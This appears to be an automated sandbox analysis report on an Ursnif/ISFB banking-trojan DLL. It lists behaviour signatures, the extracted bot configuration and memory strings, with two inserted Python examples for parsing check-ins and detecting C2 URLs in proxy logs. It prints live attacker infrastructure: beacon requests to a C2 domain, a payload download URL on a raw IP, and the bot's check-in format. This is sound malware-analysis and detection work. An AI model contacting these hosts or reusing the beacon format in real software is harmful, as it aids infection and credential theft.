Analysis Report 5fd9d7ec9e7aetar.dll

Overview

General Information

Sample Name: 5fd9d7ec9e7aetar.dll
Analysis ID: 331120
MD5: 7d675f9a252b26cd655607ae8b36c3e9
SHA1: 522894a5e30417192c053579d583ff7a690316a7
SHA256: 5e7f200f26fb2fc09ca80862fc6bec38f7d539aada080af6461771f9233c054f
Tags: brt, dll, gozi, isfb, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Found malware configuration
Source: loaddll32.exe.5508.0.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: rosadalking.xyz Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: 5fd9d7ec9e7aetar.dll Virustotal: Detection: 12%
Source: 5fd9d7ec9e7aetar.dll ReversingLabs: Detection: 10%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.1500000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Spreading:

Contains functionality to get notified if a device is plugged in / out
Source: C:\Windows\explorer.exe Code function: 37_2_03B7174C RegisterDeviceNotificationA, 37_2_03B7174C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F632BA
Source: C:\Windows\explorer.exe Code function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B70180
Source: C:\Windows\explorer.exe Code function: 37_2_03B60C34 FindFirstFileW, 37_2_03B60C34
Source: C:\Windows\explorer.exe Code function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW, 37_2_03B5A85C

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} (3 times)
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
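The format strings in the memory dump above (soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x and version=%u&soft=%u&user=...&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s...&tor=1&dns=%s&whoami=%s) give the field layout of the bot's check-in, and the configuration the extractor recovered from loaddll32.exe in the AV Detection section supplies the values this sample fills in (server 12, id 4343, soft 3, version 250167, a 32-hex-digit user id). As an added example, not part of the Joe Sandbox report, the following Python parses a plaintext check-in of that shape and checks it against the extracted configuration. The check-in string is constructed from the extracted values; the type, name, ip and os values are placeholders chosen here, and the bot only ever sends this data encrypted and encoded inside the URL path, so in practice this runs on the decrypted request.

```python
"""Parse an Ursnif/ISFB check-in string and compare it with the extracted config.

Added example; not part of the Joe Sandbox report. Field layout follows the
format strings found in memory; the sample beacon is CONSTRUCTED from the
extracted configuration, with placeholder type/name/ip/os values."""
from urllib.parse import parse_qsl

# Configuration reported by the extractor for loaddll32.exe (from the report).
EXTRACTED_CONFIG = {
    "server": "12", "whoami": "user@320946hh", "dns": "320946",
    "version": "250167", "uptime": "175", "crc": "2", "id": "4343",
    "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3",
}

# Constructed plaintext check-in; type/name/ip/os are placeholders (assumption).
SAMPLE_BEACON = (
    "version=250167&soft=3&user=c2868f8f08f8d2d8cdc8873aab08ddd5&server=12"
    "&id=4343&type=1&name=WIN-TEST&ip=10.0.0.5&os=10.0_0_1_x64&tor=1"
    "&dns=320946&whoami=user@320946hh"
)

# Fields the format string emits with %u (unsigned decimal).
NUMERIC_FIELDS = ("version", "soft", "server", "id", "type", "tor")
HEX_DIGITS = set("0123456789abcdef")


def parse_beacon(s):
    """Split the check-in into a dict and validate the types the format implies."""
    fields = dict(parse_qsl(s, keep_blank_values=True))
    for k in NUMERIC_FIELDS:
        if k in fields and not fields[k].isdigit():
            raise ValueError(f"field {k} should be numeric, got {fields[k]!r}")
    user = fields.get("user", "")
    # user=%08x%08x%08x%08x -> exactly 32 lowercase hex digits
    if len(user) != 32 or not set(user) <= HEX_DIGITS:
        raise ValueError("user field is not four %08x words")
    return fields


def match_config(fields, config):
    """Return the config keys whose value differs from the beacon (empty = match)."""
    compare = ("version", "soft", "user", "server", "id", "dns", "whoami")
    return [k for k in compare if fields.get(k) != config.get(k)]


def beacon_matches_sample(s=SAMPLE_BEACON, config=EXTRACTED_CONFIG):
    """True when a check-in carries exactly this sample's extracted identity."""
    return match_config(parse_beacon(s), config) == []


if __name__ == "__main__":
    for k, v in parse_beacon(SAMPLE_BEACON).items():
        print(f"{k:8} {v}")
    print("matches extracted config:", beacon_matches_sample())
```

The comparison keys are the ones that are stable per build and per victim (version, soft, server, id identify the campaign build; user, dns and whoami identify the host), which is what makes the extracted configuration usable as a fingerprint for other check-ins from the same infection.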
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 216.58.210.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
Source: unknown TCP traffic detected without corresponding DNS query: 89.44.9.160 (3 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54 (17 connections)
Source: global traffic HTTP traffic detected:
  GET /images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/xeggxPGc7nfKRGZxkwY7m/6XO3LRBusWZ68b2Q/9CuG_2BFhJPugx2/mLb9eBF61d6PEdK9bs/54NcT0amJ/cPoLRcNqBcfX0RKHxYZO/vGw1uksCwbrdZy38AcM/QknS0Ofxufsp/AGlpBU.avi HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: rosadalking.xyz
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: rosadalking.xyz
  Connection: Keep-Alive
  Cookie: PHPSESSID=ioak1ilk7vhlu36vv01oie9fv7; lang=en
Source: global traffic HTTP traffic detected:
  GET /images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDsy5Ztqa5MO/ZE1uNeIragrUuVu9/t1VvHxGOnUeE0N9/AofD3_2FkZDH3xF9WG/e6QRtMJki/mDfRsmXPGHOJcDq1VRhX/EAwOOQEOyOVMOCO4aMJ/IIjWmZnO6yO6LwKDQCAmcr/fLzp.avi HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: rosadalking.xyz
  Connection: Keep-Alive
  Cookie: lang=en
Source: global traffic HTTP traffic detected:
  GET /images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9_2B9CFok/IIciaBbavff8xIv/QDnJnQxg5GFZWds3Q4/WJYPPBvIM/fTQamjd1C8ZF4x_2BQAG/7tjeWUw0l7HYY5PaqB5/4nRQ7JoUoZ1VN0XTFxi7Cj/sa195v8n0NrfN/CyTgvxQv/A6Pn.avi HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: rosadalking.xyz
  Connection: Keep-Alive
  Cookie: lang=en
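The three GET requests to rosadalking.xyz above share the URL shape Ursnif/ISFB uses for its beacon: one long base64 blob broken into pseudo-directories under /images/, with the '+' and '/' of the base64 alphabet written as _2B and _2F, and a decoy media extension (.avi here) on the last piece. As an added example, not part of the Joe Sandbox report, the following Python turns that shape into a proxy-log heuristic. The minimum length and segment count, the extension list and the _2D escape for '=' are assumptions chosen for this example; the log lines are constructed, with the two C2 URLs copied from the first and third requests above and the other lines benign filler.

```python
"""Heuristic proxy-log detector for Ursnif/ISFB-style C2 URLs.

Added example, not part of the Joe Sandbox report. Thresholds, the extension
list and the _2D escape are assumptions made for this example."""
import base64
import re
from urllib.parse import urlsplit

# Decoy file extension ending the beacon path (.avi in this sample; the rest
# of the list is an assumption).
DECOY_EXT = re.compile(r"\.(avi|jpeg|jpg|gif|bmp|png|css|js|txt|mp4)$", re.I)
# Substitutions ISFB applies to the base64 text ('_2D' is an assumption).
ESCAPES = {"_2B": "+", "_2F": "/", "_2D": "="}

# C2 URLs copied from the report's HTTP traffic (first and third request).
C2_URL_1 = ("http://rosadalking.xyz/images/PyPG1445hl/46EQl_2BHA_2B7TdC/"
            "2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/xeggxPGc7nfKRGZxkwY7m/"
            "6XO3LRBusWZ68b2Q/9CuG_2BFhJPugx2/mLb9eBF61d6PEdK9bs/54NcT0amJ/"
            "cPoLRcNqBcfX0RKHxYZO/vGw1uksCwbrdZy38AcM/QknS0Ofxufsp/AGlpBU.avi")
C2_URL_2 = ("http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/"
            "FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9_2B9CFok/"
            "IIciaBbavff8xIv/QDnJnQxg5GFZWds3Q4/WJYPPBvIM/fTQamjd1C8ZF4x_2BQAG/"
            "7tjeWUw0l7HYY5PaqB5/4nRQ7JoUoZ1VN0XTFxi7Cj/sa195v8n0NrfN/CyTgvxQv/"
            "A6Pn.avi")

# Constructed proxy log, one request per line: "<client> <method> <url> <status>".
SAMPLE_LOG = f"""\
10.0.0.5 GET {C2_URL_1} 200
10.0.0.5 GET http://rosadalking.xyz/favicon.ico 200
10.0.0.5 GET {C2_URL_2} 200
10.0.0.7 GET http://cdn.example.com/images/2021/12/banner_2x.jpg 200
"""


def isfb_blob(url):
    """Recover the base64 text from an ISFB-style path: drop the leading decoy
    directory and the decoy extension, join the slash-broken pieces, then undo
    the escapes.  Slashes are removed first because an escape can straddle one
    ('..._2/FfVuj...' in C2_URL_2 is a split '_2F')."""
    path = DECOY_EXT.sub("", urlsplit(url).path)
    pieces = [p for p in path.split("/") if p]
    body = "".join(pieces[1:])            # pieces[0] is the directory, 'images'
    for esc, ch in ESCAPES.items():
        body = body.replace(esc, ch)
    return body


def looks_like_isfb_url(url, min_len=64, min_segments=6):
    """True when the URL has the beacon shape and its blob is valid base64."""
    path = urlsplit(url).path
    if path.count("/") < min_segments or not DECOY_EXT.search(path):
        return False
    if "_2" not in path.replace("/", ""):   # at least one escaped '+', '/' or '='
        return False
    blob = isfb_blob(url).rstrip("=")
    if len(blob) < min_len or not re.fullmatch(r"[A-Za-z0-9+/]+", blob):
        return False
    try:   # must decode; the content stays encrypted, only the encoding is checked
        base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError:                      # binascii.Error is a ValueError
        return False
    return True


def scan_log(text):
    """Return (client, url) pairs whose URL matches the heuristic."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and looks_like_isfb_url(parts[2]):
            hits.append((parts[0], parts[2]))
    return hits


if __name__ == "__main__":
    for client, url in scan_log(SAMPLE_LOG):
        print(client, len(isfb_blob(url)), url[:60] + "...")
```

Both report URLs reassemble to a 192-character blob, i.e. 144 bytes, a multiple of the 16-byte block size of the Serpent cipher ISFB encrypts its requests with; a blob whose length is not a multiple of four base64 characters, or that contains characters outside the alphabet after unescaping, is rejected. The favicon request that follows the first beacon in the report, and benign image paths that merely contain "_2", do not match.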
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: rosadalking.xyz
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: http://89.44.9.160/gr32.rar
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: http://89.44.9.160/gr32.rarB
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: http://89.44.9.160/gr32.rarb
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?aa4ec0d4b8242
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: ~DF224E930954C99BCE.TMP.4.dr, {CB1D97FB-3FD1-11EB-90E5-ECF4BB570DC9}.dat.4.dr String found in binary or memory: http://firestore.googleapis.com/images/5gl1_2BhlXsWr7coQSs/4F845jkaqRiUCXeQicZCJl/ANd4nGixTqMmg/W9Sd
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
